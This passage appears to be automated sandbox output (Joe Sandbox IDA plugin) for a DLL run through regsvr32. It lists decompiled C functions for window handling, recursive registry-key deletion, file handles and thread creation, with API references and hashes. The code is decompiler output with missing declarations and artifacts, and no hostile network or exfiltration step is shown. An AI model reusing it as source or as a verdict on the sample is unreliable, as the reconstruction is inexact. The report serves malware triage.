                                                                                                                0x1001ee9e
                                                                                                                0x1001eea1
                                                                                                                0x00000000
                                                                                                                0x1001ee73
                                                                                                                0x1001ee73
                                                                                                                0x1001ee76
                                                                                                                0x1001ee7c
                                                                                                                0x1001ee7e
                                                                                                                0x1001ee83
                                                                                                                0x1001ee87
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001ee87
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001eedc
                                                                                                                0x1001eee2
                                                                                                                0x1001eee5
                                                                                                                0x1001eeea
                                                                                                                0x1001eeea
                                                                                                                0x1001eeea
                                                                                                                0x1001eeee
                                                                                                                0x1001eeee
                                                                                                                0x1001eef1
                                                                                                                0x1001eef4
                                                                                                                0x1001eef9
                                                                                                                0x1001eefe
                                                                                                                0x1001ef01
                                                                                                                0x1001ef04
                                                                                                                0x1001ef07
                                                                                                                0x1001ede3
                                                                                                                0x1001ede5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001edcf
                                                                                                                0x1001ef37
                                                                                                                0x1001ef3c

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1001EDAF
                                                                                                                • SendMessageA.USER32 ref: 1001EE27
                                                                                                                • GetBkColor.GDI32(?), ref: 1001EE30
                                                                                                                • GetTextColor.GDI32(?), ref: 1001EE3C
                                                                                                                • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 1001EECE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 187318432-0
                                                                                                                • Opcode ID: 62dfae7340719bea7615cf68d9534f3c47370a058b5ce6014fda78c19ddc3777
                                                                                                                • Instruction ID: 00b0699e3c53c59abbf3ef17ad68b9bdbfacd4536d62d57434d84be85a47f183
                                                                                                                • Opcode Fuzzy Hash: 62dfae7340719bea7615cf68d9534f3c47370a058b5ce6014fda78c19ddc3777
                                                                                                                • Instruction Fuzzy Hash: 0941243481078ADFCB20DF64D848A9EB7B0FF08310F118959F8969B2A1EB74ED81DB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E10015060(void* __eflags) {
                                                                                                                				char _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                				intOrPtr _v36;
                                                                                                                				void* __ebx;
                                                                                                                				void* __ecx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t24;
                                                                                                                				int _t30;
                                                                                                                				intOrPtr _t37;
                                                                                                                				intOrPtr _t38;
                                                                                                                				void* _t45;
                                                                                                                				void* _t56;
                                                                                                                				void* _t60;
                                                                                                                				signed int _t65;
                                                                                                                				void* _t69;
                                                                                                                
                                                                                                                				_t69 = __eflags;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E100528AA);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_push(_t45);
                                                                                                                				_push(_t56);
                                                                                                                				_t24 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t24 ^ _t65);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t60 = _t45;
                                                                                                                				E10021017(_t45, _t56);
                                                                                                                				ShowCursor(0);
                                                                                                                				 *(_t60 + 0x74) = E100160BC(_t69, 0x24);
                                                                                                                				_t30 = GetSystemMetrics(1);
                                                                                                                				_t43 = GetSystemMetrics(0);
                                                                                                                				GetCursorPos( *(_t60 + 0x74));
                                                                                                                				E1001D320(_t60, 0, 0, _t31, _t30, 1);
                                                                                                                				 *((intOrPtr*)( *(_t60 + 0x74) + 8)) = 0;
                                                                                                                				 *((intOrPtr*)( *(_t60 + 0x74) + 0xc)) = 0;
                                                                                                                				 *((intOrPtr*)( *(_t60 + 0x74) + 0x14)) = 0;
                                                                                                                				 *((intOrPtr*)( *(_t60 + 0x74) + 0x18)) = 0;
                                                                                                                				 *((intOrPtr*)( *(_t60 + 0x74) + 0x10)) = 0;
                                                                                                                				 *((intOrPtr*)( *(_t60 + 0x74) + 0x1c)) = 0;
                                                                                                                				_t37 = E100160BC(_t69, 0x14);
                                                                                                                				_v36 = _t37;
                                                                                                                				_t70 = _t37;
                                                                                                                				_v24 = 0;
                                                                                                                				if(_t37 == 0) {
                                                                                                                					_t38 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                				} else {
                                                                                                                					_push(_t60);
                                                                                                                					_t38 = E100245C1(_t43, _t37, 0, _t60, _t70);
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)( *(_t60 + 0x74) + 0x20)) = _t38;
                                                                                                                				 *((intOrPtr*)(_t60 + 0x78)) = CreateThread(0, 0, E10014DC0,  *(_t60 + 0x74), 0, 0);
                                                                                                                				 *[fs:0x0] = _v16;
                                                                                                                				return 1;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • ShowCursor.USER32 ref: 1001508F
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                • GetSystemMetrics.USER32 ref: 100150AA
                                                                                                                • GetSystemMetrics.USER32 ref: 100150AF
                                                                                                                • GetCursorPos.USER32(?), ref: 100150B7
                                                                                                                  • Part of subcall function 1001D320: MoveWindow.USER32(?,?,?,?,?,?), ref: 1001D33B
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00014DC0,?,00000000,00000000), ref: 10015123
                                                                                                                  • Part of subcall function 100245C1: __EH_prolog3.LIBCMT ref: 100245C8
                                                                                                                  • Part of subcall function 100245C1: GetDC.USER32(00000000), ref: 100245F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CursorMetricsSystem$CreateH_prolog3MoveShowThreadWindow_malloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3747044625-0
                                                                                                                • Opcode ID: 9d56638d0798fa0edfb61b696bbaa9e8c452ee3758c5d68de8c4ebb8d90d6298
                                                                                                                • Instruction ID: 2156ac84355e622140c053a3dacdb82c667ceb93240069a7e395ce59ff294df3
                                                                                                                • Opcode Fuzzy Hash: 9d56638d0798fa0edfb61b696bbaa9e8c452ee3758c5d68de8c4ebb8d90d6298
                                                                                                                • Instruction Fuzzy Hash: 42217CB5A40B00AFD311CF29CC84E17FBE8EF89B10F000A1EF65187661D776E8418B61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E1001A6FA(signed int __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				struct HWND__* _t29;
                                                                                                                				signed int _t33;
                                                                                                                				signed short _t37;
                                                                                                                				signed int _t39;
                                                                                                                				struct HWND__* _t54;
                                                                                                                				void* _t55;
                                                                                                                				void* _t56;
                                                                                                                
                                                                                                                				_t56 = __eflags;
                                                                                                                				_t43 = __ebx;
                                                                                                                				_push(0x80);
                                                                                                                				E1003D1E6(E10052F96, __ebx, __edi, __esi);
                                                                                                                				 *(_t55 - 0x10) = __ecx;
                                                                                                                				E1001CDB8(_t55 - 0x38);
                                                                                                                				_t46 = _t55 - 0x8c;
                                                                                                                				E10018895(_t55 - 0x8c, _t56);
                                                                                                                				 *(_t55 - 4) = 0;
                                                                                                                				_t29 = GetTopWindow( *(__ecx + 0x20));
                                                                                                                				while(1) {
                                                                                                                					_t54 = _t29;
                                                                                                                					if(_t54 == 0) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					 *(_t55 - 0x6c) = _t54;
                                                                                                                					 *(_t55 - 0x34) = GetDlgCtrlID(_t54) & 0x0000ffff;
                                                                                                                					 *((intOrPtr*)(_t55 - 0x24)) = _t55 - 0x8c;
                                                                                                                					_t33 = E10019C3D(_t46, 0, _t54, __eflags, _t54);
                                                                                                                					__eflags = _t33;
                                                                                                                					if(_t33 == 0) {
                                                                                                                						L3:
                                                                                                                						_t46 =  *(_t55 - 0x10);
                                                                                                                						__eflags = E1001CC4A(_t43,  *(_t55 - 0x10), _t54,  *(_t55 - 0x34), 0xffffffff, _t55 - 0x38, 0);
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t43 =  *(_t55 + 0xc);
                                                                                                                							__eflags = _t43;
                                                                                                                							if(_t43 != 0) {
                                                                                                                								_t37 = SendMessageA( *(_t55 - 0x6c), 0x87, 0, 0);
                                                                                                                								__eflags = _t37 & 0x00002000;
                                                                                                                								if((_t37 & 0x00002000) == 0) {
                                                                                                                									L10:
                                                                                                                									_t43 = 0;
                                                                                                                									__eflags = 0;
                                                                                                                								} else {
                                                                                                                									_t39 = E1001D23C(_t55 - 0x8c) & 0x0000000f;
                                                                                                                									__eflags = _t39 - 3;
                                                                                                                									if(_t39 == 3) {
                                                                                                                										goto L10;
                                                                                                                									} else {
                                                                                                                										__eflags = _t39 - 6;
                                                                                                                										if(_t39 == 6) {
                                                                                                                											goto L10;
                                                                                                                										} else {
                                                                                                                											__eflags = _t39 - 7;
                                                                                                                											if(_t39 == 7) {
                                                                                                                												goto L10;
                                                                                                                											} else {
                                                                                                                												__eflags = _t39 - 9;
                                                                                                                												if(_t39 == 9) {
                                                                                                                													goto L10;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							_t46 = _t55 - 0x38;
                                                                                                                							E1001CDDE(_t55 - 0x38,  *((intOrPtr*)(_t55 + 8)), _t43);
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t46 = _t33;
                                                                                                                						__eflags = E1001CC4A(_t43, _t33, _t54, 0, 0xbd11ffff, _t55 - 0x38, 0);
                                                                                                                						if(__eflags == 0) {
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t29 = GetWindow(_t54, 2);
                                                                                                                				}
                                                                                                                				_t21 = _t55 - 4;
                                                                                                                				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
                                                                                                                				 *(_t55 - 0x6c) = 0;
                                                                                                                				return E1003D2BE(E1001A3E3(_t43, _t55 - 0x8c, 0, _t54,  *_t21));
                                                                                                                			}











                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CtrlH_prolog3MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 849854284-0
                                                                                                                • Opcode ID: 12cab4c5c9df0587153cfc637b0498b060e230d64710f68d7e1a98f33d35c220
                                                                                                                • Instruction ID: d95d501e835515873e6f3d5e56d1f9e748836c9714b8f44335a593d4f42921f8
                                                                                                                • Opcode Fuzzy Hash: 12cab4c5c9df0587153cfc637b0498b060e230d64710f68d7e1a98f33d35c220
                                                                                                                • Instruction Fuzzy Hash: F4219A35804119AADB15EBA0DC85EAEBBF8FF56750F10411AF456EB0D1EA30DEC1DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E100220F7(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				long _t42;
                                                                                                                				long _t45;
                                                                                                                				long _t52;
                                                                                                                				void* _t65;
                                                                                                                				void* _t69;
                                                                                                                				void* _t75;
                                                                                                                				void* _t79;
                                                                                                                
                                                                                                                				_t73 = __edx;
                                                                                                                				_push(8);
                                                                                                                				E1003D1E6(E1005365D, __ebx, __edi, __esi);
                                                                                                                				_t75 = __ecx;
                                                                                                                				 *(_t79 - 0x14) = 0;
                                                                                                                				if(( *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00080000) == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
                                                                                                                					L9:
                                                                                                                					E10005030(_t73, _t79,  *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x74)) + 0x1c)));
                                                                                                                				} else {
                                                                                                                					E10001050(_t79 - 0x10, __edx, E100173A6());
                                                                                                                					 *(_t79 - 4) = 0;
                                                                                                                					_t42 = E10001C60(_t79 - 0x10, 0x104);
                                                                                                                					_t60 = GetParent;
                                                                                                                					 *(_t79 - 0x14) = _t42;
                                                                                                                					_t45 = SendMessageA( *(E10019C16(GetParent, _t79 - 0x10, _t79, GetParent( *(_t75 + 0x20))) + 0x20), 0x464, 0x104,  *(_t79 - 0x14));
                                                                                                                					_t65 = _t79 - 0x10;
                                                                                                                					if(_t45 >= 0) {
                                                                                                                						E10019B0F(GetParent, _t65, _t75, 0xffffffff);
                                                                                                                					} else {
                                                                                                                						E100019E0(_t65);
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)( *((intOrPtr*)(_t79 - 0x10)) - 0xc)) == 0) {
                                                                                                                						L8:
                                                                                                                						 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
                                                                                                                						E10001020( *((intOrPtr*)(_t79 - 0x10)) + 0xfffffff0, _t73);
                                                                                                                						goto L9;
                                                                                                                					} else {
                                                                                                                						 *(_t79 - 0x14) = E10001C60(_t79 - 0x10, 0x104);
                                                                                                                						_t52 = SendMessageA( *(E10019C16(_t60, _t79 - 0x10, _t79, GetParent( *(_t75 + 0x20))) + 0x20), 0x465, 0x104,  *(_t79 - 0x14));
                                                                                                                						_t69 = _t79 - 0x10;
                                                                                                                						if(_t52 >= 0) {
                                                                                                                							E10019B0F(_t60, _t69, _t75, 0xffffffff);
                                                                                                                							E10001140( *((intOrPtr*)(_t79 + 8)), __eflags, _t79 - 0x10);
                                                                                                                							E10001020( *((intOrPtr*)(_t79 - 0x10)) + 0xfffffff0, _t73);
                                                                                                                						} else {
                                                                                                                							E100019E0(_t69);
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E1003D2BE( *((intOrPtr*)(_t79 + 8)));
                                                                                                                			}











                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageParentSend$H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 1482283565-0
                                                                                                                • Opcode ID: b153e555a7cb6d8ced71ce106a1a3a49bb70b7c8d57b55e96d703d60e1cf100b
                                                                                                                • Instruction ID: eff1c64d9807f60192a5bcbc1d1dea6d10616ecf9b1d23ee537e2d346d076b4b
                                                                                                                • Opcode Fuzzy Hash: b153e555a7cb6d8ced71ce106a1a3a49bb70b7c8d57b55e96d703d60e1cf100b
                                                                                                                • Instruction Fuzzy Hash: ED31BD75A00219EFDB05DFA0CD96EAEBBB4FF043A0B000215F5616B1E6DB30AA50DB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E10025F1C(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t25;
                                                                                                                				signed int _t30;
                                                                                                                				void* _t32;
                                                                                                                				signed int _t34;
                                                                                                                				signed int _t42;
                                                                                                                				void* _t43;
                                                                                                                				void* _t44;
                                                                                                                				char** _t54;
                                                                                                                				void* _t55;
                                                                                                                				void* _t58;
                                                                                                                				char* _t59;
                                                                                                                				void* _t61;
                                                                                                                
                                                                                                                				_t42 = __ebx;
                                                                                                                				_t59 = _t61 - 0x104;
                                                                                                                				_t25 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_t59[0x108] = _t25 ^ _t59;
                                                                                                                				_push(0x18);
                                                                                                                				E1003D219(E10053AC4, __ebx, __edi, __esi);
                                                                                                                				_t54 = _t59[0x118];
                                                                                                                				_t44 = _t59[0x114];
                                                                                                                				_t52 = _t59 - 0x18;
                                                                                                                				 *(_t59 - 0x20) = _t44;
                                                                                                                				 *(_t59 - 0x1c) = _t54;
                                                                                                                				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
                                                                                                                				_t57 = _t30;
                                                                                                                				if(_t30 == 0) {
                                                                                                                					while(1) {
                                                                                                                						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
                                                                                                                						_t57 = _t34;
                                                                                                                						_t66 = _t57;
                                                                                                                						if(_t57 != 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
                                                                                                                						E10005030(_t52, _t59, _t59);
                                                                                                                						 *(_t59 - 4) = 1;
                                                                                                                						_t57 = E10025F1C(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
                                                                                                                						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
                                                                                                                						 *(_t59 - 4) = 0;
                                                                                                                						E10001020( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
                                                                                                                						if(_t42 == 0) {
                                                                                                                							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					__eflags = _t57 - 0x103;
                                                                                                                					if(_t57 == 0x103) {
                                                                                                                						L6:
                                                                                                                						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
                                                                                                                					} else {
                                                                                                                						__eflags = _t57 - 0x3f2;
                                                                                                                						if(_t57 == 0x3f2) {
                                                                                                                							goto L6;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					RegCloseKey( *(_t59 - 0x18));
                                                                                                                				}
                                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
                                                                                                                				_pop(_t55);
                                                                                                                				_pop(_t58);
                                                                                                                				_pop(_t43);
                                                                                                                				_t32 = E1003B437(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
                                                                                                                				__eflags =  &(_t59[0x10c]);
                                                                                                                				return _t32;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 10025F3B
                                                                                                                • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 10025F5A
                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10025F78
                                                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 10025FF3
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10025FFE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseDeleteEnumH_prolog3_catchOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3522057324-0
                                                                                                                • Opcode ID: 420f038bc46650a4cd1f1d3a290e666fe69e2596bfbc6e69b46c67e3b7788df5
                                                                                                                • Instruction ID: b2a7dd213501d3c3d9ee7ff6652eb151e949eb3d59d1a8e29eea62385233ddcb
                                                                                                                • Opcode Fuzzy Hash: 420f038bc46650a4cd1f1d3a290e666fe69e2596bfbc6e69b46c67e3b7788df5
                                                                                                                • Instruction Fuzzy Hash: 7121F035D0025ADFDB61DB94DD41BEEB7B4EF08321F500126E981A72D0DB305E44DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E1003F949(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				long _t27;
                                                                                                                				signed int _t34;
                                                                                                                				signed int _t36;
                                                                                                                				signed char _t42;
                                                                                                                				intOrPtr* _t46;
                                                                                                                				void* _t49;
                                                                                                                				signed int _t56;
                                                                                                                				void* _t57;
                                                                                                                
                                                                                                                				_t55 = __esi;
                                                                                                                				_t49 = __edx;
                                                                                                                				_push(0xc);
                                                                                                                				_push(0x10068c20);
                                                                                                                				E1003D578(__ebx, __edi, __esi);
                                                                                                                				 *(_t57 - 0x1c) = 0;
                                                                                                                				_t42 = 0;
                                                                                                                				if(( *(_t57 + 0xc) & 0x00000008) != 0) {
                                                                                                                					_t42 = 0x20;
                                                                                                                				}
                                                                                                                				if(( *(_t57 + 0xc) & 0x00004000) != 0) {
                                                                                                                					_t42 = _t42 | 0x00000080;
                                                                                                                				}
                                                                                                                				if(( *(_t57 + 0xc) & 0x00000080) != 0) {
                                                                                                                					_t42 = _t42 | 0x00000010;
                                                                                                                				}
                                                                                                                				_t27 = GetFileType( *(_t57 + 8));
                                                                                                                				if(_t27 != 0) {
                                                                                                                					__eflags = _t27 - 2;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						__eflags = _t27 - 3;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t42 = _t42 | 0x00000008;
                                                                                                                							__eflags = _t42;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t42 = _t42 | 0x00000040;
                                                                                                                					}
                                                                                                                					_t56 = E1003F7AA(_t42, _t49, 0, _t55, __eflags);
                                                                                                                					 *(_t57 + 0xc) = _t56;
                                                                                                                					__eflags = _t56 - 0xffffffff;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						 *((intOrPtr*)(_t57 - 4)) = 0;
                                                                                                                						E1003F579(_t42, _t56,  *(_t57 + 8));
                                                                                                                						_t46 = 0x10071ac0 + (_t56 >> 5) * 4;
                                                                                                                						_t34 = (_t56 & 0x0000001f) * 0x28;
                                                                                                                						 *( *_t46 + _t34 + 4) = _t42 | 0x00000001;
                                                                                                                						 *( *_t46 + _t34 + 0x24) =  *( *_t46 + _t34 + 0x24) & 0x00000080;
                                                                                                                						 *( *_t46 + _t34 + 0x24) =  *( *_t46 + _t34 + 0x24) & 0x0000007f;
                                                                                                                						 *(_t57 - 0x1c) = 1;
                                                                                                                						 *((intOrPtr*)(_t57 - 4)) = 0xfffffffe;
                                                                                                                						_t36 = E1003FA36(0, _t56);
                                                                                                                						__eflags =  *(_t57 - 0x1c);
                                                                                                                						if( *(_t57 - 0x1c) == 0) {
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                						_t37 = _t56;
                                                                                                                						goto L9;
                                                                                                                					} else {
                                                                                                                						 *((intOrPtr*)(E1003D47E(__eflags))) = 0x18;
                                                                                                                						_t36 = E1003D491(__eflags);
                                                                                                                						 *_t36 = 0;
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t36 = E1003D4A4(GetLastError());
                                                                                                                					L8:
                                                                                                                					_t37 = _t36 | 0xffffffff;
                                                                                                                					L9:
                                                                                                                					return E1003D5BD(_t37);
                                                                                                                				}
                                                                                                                			}











                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                                                                                • String ID:
                                                                                                                • API String ID: 43408053-0
                                                                                                                • Opcode ID: 4d80846e16eb1202dfe639fb837b8850852b5d75ce4fe7bf4f375aa722c3bfda
                                                                                                                • Instruction ID: f269f83d55b24e5bd8462084fb6d5c2141c54d8dce9e7613424e65711a3cc68f
                                                                                                                • Opcode Fuzzy Hash: 4d80846e16eb1202dfe639fb837b8850852b5d75ce4fe7bf4f375aa722c3bfda
                                                                                                                • Instruction Fuzzy Hash: FA21F134901645AEDB03DF34C8017AD7B90EF46365F28864EE4E48F1E2C7789A41CF81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 20%
                                                                                                                			E10040AD8(void* __edx, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
                                                                                                                				DWORD* _v8;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t20;
                                                                                                                				DWORD* _t25;
                                                                                                                				intOrPtr* _t27;
                                                                                                                				char _t41;
                                                                                                                				void* _t44;
                                                                                                                
                                                                                                                				_t41 = _a12;
                                                                                                                				_t48 = _t41;
                                                                                                                				_v8 = 0;
                                                                                                                				if(_t41 != 0) {
                                                                                                                					E1004296C();
                                                                                                                					_t44 = E10046749(1, 0x214);
                                                                                                                					__eflags = _t44;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						L7:
                                                                                                                						_push(_t44);
                                                                                                                						E1003B59D(0, _t41, _t44, __eflags);
                                                                                                                						__eflags = _v8;
                                                                                                                						if(_v8 != 0) {
                                                                                                                							E1003D4A4(_v8);
                                                                                                                						}
                                                                                                                						_t20 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                					} else {
                                                                                                                						_push( *((intOrPtr*)(E10042B23(__edx, _t41, __eflags) + 0x6c)));
                                                                                                                						_push(_t44);
                                                                                                                						E100429EC(0, _t41, _t44, __eflags);
                                                                                                                						 *(_t44 + 4) =  *(_t44 + 4) | 0xffffffff;
                                                                                                                						 *((intOrPtr*)(_t44 + 0x58)) = _a16;
                                                                                                                						_t25 = _a24;
                                                                                                                						__eflags = _t25;
                                                                                                                						 *((intOrPtr*)(_t44 + 0x54)) = _t41;
                                                                                                                						if(_t25 == 0) {
                                                                                                                							_t25 =  &_a12;
                                                                                                                						}
                                                                                                                						_t20 = CreateThread(_a4, _a8, 0x10040a58, _t44, _a20, _t25);
                                                                                                                						__eflags = _t20;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_v8 = GetLastError();
                                                                                                                							goto L7;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t27 = E1003D47E(_t48);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					 *_t27 = 0x16;
                                                                                                                					E10041BCB(0, __edx, _t41);
                                                                                                                					_t20 = 0;
